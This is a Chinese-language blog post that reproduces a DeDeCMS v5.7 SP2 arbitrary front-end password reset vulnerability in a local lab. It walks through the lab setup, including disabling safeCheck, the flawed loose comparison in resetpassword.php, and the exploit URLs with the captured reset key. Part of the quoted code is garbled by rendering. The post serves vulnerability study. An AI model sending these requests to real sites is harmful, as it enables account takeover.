DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改 漏洞复现(包括环境搭建)

最新推荐文章于 2024-04-07 01:45:27 发布
最新推荐文章于 2024-04-07 01:45:27 发布
阅读量3.4k 收藏 10
点赞数 3
分类专栏: 渗透测试 文章标签: 安全 安全漏洞 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52497013/article/details/121468861
版权

一、漏洞概述

1 简介

织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。

2 漏洞限制

​ 1、 只影响前台账户

​ 2、 只能修改未设置安全问题的账户

3 影响版本

DeDeCMSV5.7SP2 正式版(2018-01-09)

二、环境搭建

1下载DeDeCMSV5.7SP2 正式版(2018-01-09)的源码

在这里插入图片描述

​ 该版本环境为php5.6+mysql

2利用phpstudy搭建网站并安装dedecms

将源码内容复制,并在phpstudy的网站根目录下创建新文件夹dedecms,将源码内容复制进去:

在这里插入图片描述

​ 点击创建网站,域名为127.0.0.1,端口除了80随意设置,按照以下进行设置:

在这里插入图片描述

确认并重启网络服务,网站就搭建好了,下面打开网站进入dedecms安装界面:

在这里插入图片描述

点击继续

在这里插入图片描述

数据库密码是在phpstudy里的数据库密码,一般是root,管理员就按照默认设置账户和密码:

在这里插入图片描述

这时点击继续会出现以下界面,应该是一些安全配置没有设置好

在这里插入图片描述

打开源码目录下D:\phpstudy_pro\WWW\dedecms\include,找到dedesql.class.php和dedesqli.class.php两个php文件,用notepad++打开,然后ctrl+F寻找safeCheck,把TURE改为FALSE,关闭安全检查

在这里插入图片描述

在这里插入图片描述

保存之后,刷新界面安装完成,环境搭建完毕

在这里插入图片描述

三、漏洞复现

1.漏洞原因及触发位置

由于前台resetpassword.php中对接受的safeanswer参数类型比较不够严格,遭受弱类型比较攻击

导致了远程攻击者可以在前台会员中心绕过验证,进行任意用户密码重置攻击

漏洞触发位置:dedecms/member/resetpassword.php(75行)

else if($dopost == “safequestion”)

{

$mid = preg_replace("#[^0-9]#", “”, $id);

KaTeX parse error: Expected 'EOF', got '#' at position 57: …rid,email FROM #̲@__member WHERE…mid’";

$row = d b − > G e t O n e ( db->GetOne( db>GetOne(sql);

if(empty($safequestion)) $safequestion = ‘’;

if(empty($safeanswer)) $safeanswer = ‘’;

if($row[‘safequestion’] == $safequestion && $row[‘safeanswer’] ==
$safeanswer)

{

​ sn($mid, $row[‘userid’], $row[‘email’], ‘N’);

​ exit();

}

else

{

​ ShowMsg(“对不起,您的安全问题或答案回答错误”,"-1");

​ exit();

}

}

就是这里的判断出现了问题,因为使用了不够严谨的 == 进行了比较,导致if语句的条件为真,就会进入分支,进入sn函数

if($row[‘safequestion’] == $safequestion && $row[‘safeanswer’] ==
$safeanswer)

{

sn($mid, $row[‘userid’], $row[‘email’], ‘N’);

exit();

}

2.复现过程

打开会员功能,并创建一个测试账号test:
test 初始密码1234,不要设置安全问题,这个漏洞的基础就是没有安全问题
在这里插入图片描述
在这里插入图片描述

管理后台查询test的uid为2,为接下来的复现做准备
在这里插入图片描述

打开burp进行抓包,在网站URL上输入请求:

http://127.0.0.1:9090/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2

burp抓包发现临时验证码

在这里插入图片描述

http://127.0.0.1:9090/member/resetpassword.php?dopost=getpasswd&id=2&key=ZHEZGwSd

Key= ZHEZGwSd为临时验证码,记住这个验证码

然后在URL输入:

http://127.0.0.1:9090/member/resetpassword.php?dopost=getpasswd&id=2

burp放包 跳转进入修改密码界面
在这里插入图片描述

输入刚才抓包获得验证码,修改test用户的新密码为1234567
在这里插入图片描述

修改成功
在这里插入图片描述

尝试用新密码登录
在这里插入图片描述

成功登录

在这里插入图片描述

漏洞复现完毕

_AaRong_
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)
午夜安全
11-17 3619
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2) 接着上一篇,我们已经获取到一个webshell,这篇文章是后续提权及漏洞利用。(1)systeminfo生成文件systeminfo >dedecms.txt(2)更新windows-exploit-suggester下载windows-exploit-suggester.py后,先安装xlrd,之后才可以更新。...
herewshow#poc#(CVE-2019-8362)Dedecms v5.7 sp2 后台文件上传 getshell1
07-25
1、首先构造一个文件名为1.jpg.php的文件,内容为 2、将该文件进行压缩 3、在常用操作-文件式管理器处上传压缩文件到soft目录下 5、发布预览
渗透实战:dedeCMS任意用户密码重置到内网getshell
wangluoanquan111的博客
03-18 736
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
漏洞复现--织梦CMS_V5(2),网络安全网络通信面试题
最新发布
m0_60666921的博客
04-07 857
织梦内容管理系统(DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
织梦CMS_V5.7任意用户密码重置漏洞复现
wutiangui的博客
09-12 682
漏洞位于member/resetpassword.php文件中,因未对传入的参数safeanswer进行严格类型检查,导致可使用弱类型比较绕过。在代码分析中,当 d o p o s t 等于 s a f e q u e s t i o n 时,通过传入的 dopost等于safequestion时,通过传入的 dopost等于safequestion时,通过传入的mid查询用户信息,判断安全问题和答案是否匹配。输入新密码,比如admin,然后登录试下,发现登录成功,数据库里查到的也是admin。
DeDecms(织梦CMS)最新版任意用户密码重置漏洞分析
3569
01-11 1万+
http://docs.ioin.in/writeup/xianzhi.aliyun.com/_forum_topic_1926/index.html DeDecms(织梦CMS) V5.7.72 正式版20180109 (最新版) 由于前台resetpassword.php中对接受的safeanswer参数类型比较不够严格,遭受弱类型比较攻击 导致了远程攻击者可以在前台会员中心绕过
Dedecms V5.7 sp2后台getshell漏洞复现(第一处)
weixin_42558965的博客
09-28 997
前言:为了简便,试用了phpstudy 下载dedecms V5.7 sp2 使用phpstudy新建网站www.dedtest.com,并将下载的dedecms V5.7 sp2复制到其网站目录下,然后建站 开始复现 漏洞的只要原因是出现在了C:\phpstudy_pro\WWW\www.dedtest.com\dede文件夹下的sys_varifiles.php文件,一下为代码: /*----------------------- 下载文件 function _getfiles() ----------
Dedecms V5.7 SP2版本漏洞利用
dahege666的博客
03-07 9249
一、环境搭建 系统:Win10(64位) 工具:Phpstudy 源码:DedeCMS-V5.7-GBK-SP2-Full 二、安装phpstudy https://www.xp.cn/download.html 安装完成后.... 三、下载dedecms源码 http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5....
DeDeCMS前台任意用户密码修改漏洞复现.pdf
12-16
DeDeCMS前台任意用户密码修改漏洞复现
pinohans#pinohans.github.io#Dedecms 前台任意用户密码修改1
07-25
Dedecms 前台任意用户密码修改影响版本漏洞成因在用户密码重置功能处,php 存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
07-25
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
漏洞复现--织梦CMS_V5.7任意用户密码重置漏洞
HengMengSec的博客
08-16 1617
织梦内容管理系统(DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
windows 下搭建minio 服务,设置密码和端口号
热门推荐
wlj_wangjun的博客
12-17 1万+
1.先在官网下载 minio.exe. 在 minio.exe 所在文件夹 打开命令窗口,输入minio.exe server d:\minio d:\minio 表示 文件存储路径 启动成功后可以通过 127.0.0.1:9000 来访问。默认用户名和密码 是 minioadmin/minioadmin 2.设置密码:找到 .minio.sys/config/config.json 文件,打开搜索access_key , 修改 access_key :value 用户名 s...
复现任务】织梦CMS前台任意用户密码修改漏洞简报
weixin_52852770的博客
11-29 3332
漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS 前台任意用户密码修改漏洞
手把手教你dedecms命令执行漏洞复现,纯小白也能玩懂的漏洞复现
炙热的酷盖
08-05 855
dedecms 5.7 sp2 存在命令执行漏洞 下载链接:http://www.dedecms.com/products/dedecms/ 选择UTF8就行 由于作者在进行漏洞复现时踩了很多坑,现将详细步骤附上,希望对大家有所帮助 首先需要有一个后台账号,登入网站后台 在后缀下输入/tpl.php?action=upload 查看网页源代码,找到token 记录下token: 065304c806f8f8dacb2aec2c41ace0d7 访问 http://192.16
dedecms5.7 sp2前台修改任意用户密码漏洞复现
weixin_46801402的博客
07-29 870
DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 dedecms5.7 sp2允许用户修改任意前台用户密码,不能对管理员账户造成影响,毕竟管理员账户与前台用户的数据表时分开存放的。而且,前台也不能直接登录管理员账户...
DeDeCMS v5.7{SP1,SP2} 密码修改漏洞(附PoC)
公众号shadow sock7
11-12 1万+
原文:https://paper.seebug.org/507/ 由于admin无法前台登录,所以需要先拿到admin的前台权限。 先拿到admin的前台权限 1.注册0000001用户名的账号 审核通过(或者设置为不需审核) 2. 访问/member/index.php?uid=0000001。 注意只有访问了/member/index.php?uid=0000001才会生成相应的所需的cook...
dedecms5.7sp2安装
08-14
dedecms5.7sp2安装的步骤如下: 1. 首先,你可以在自己的电脑上安装织梦dedecms进行网站后台的熟悉以及站点的建立、调试。 [1] 2. 下载织梦dedecms安装所需的工具,并按照教程一步步进行操作。 [1] 3. 安装完成后,在自定义模型中使用了union、sleep、benchmark、load_file、outfile等语句可能会出现安全警告。 [2] 4. 为了解决这个问题,你需要打开源码目录下的dedesql.class.php和dedesqli.class.php两个文件,用文本编辑器打开。 [3] 5. 在这两个文件中找到safeCheck这个参数,将其修改为FALSE,即$this->safeCheck=FALSE; [3] 通过以上步骤,你就可以成功安装dedecms5.7sp2了。希望对你有帮助!<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [织梦dedecms怎么安装?如何本地环境搭建网站?](https://blog.csdn.net/qq_43557623/article/details/112151218)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现](https://blog.csdn.net/m0_60466340/article/details/121586697)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改 漏洞复现(包括环境搭建)](https://blog.csdn.net/weixin_52497013/article/details/121468861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_AaRong_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值